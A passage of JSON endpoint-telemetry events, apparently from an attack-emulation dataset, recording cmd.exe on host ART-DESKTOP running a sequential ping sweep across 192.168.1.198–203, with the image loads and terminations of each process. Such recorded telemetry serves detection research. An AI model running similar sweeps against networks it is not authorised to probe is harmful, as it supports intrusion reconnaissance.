"{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - 
"event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5012, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "process", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572956830000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.198", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572956990000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "process", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572961990000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.199", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7916, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "process", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572966990000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.200", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "process", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572971830000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.201", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2768, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "process", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572976990000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.202", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6828, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572977130000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "process", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572981830000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.203", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7876, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "process", - 
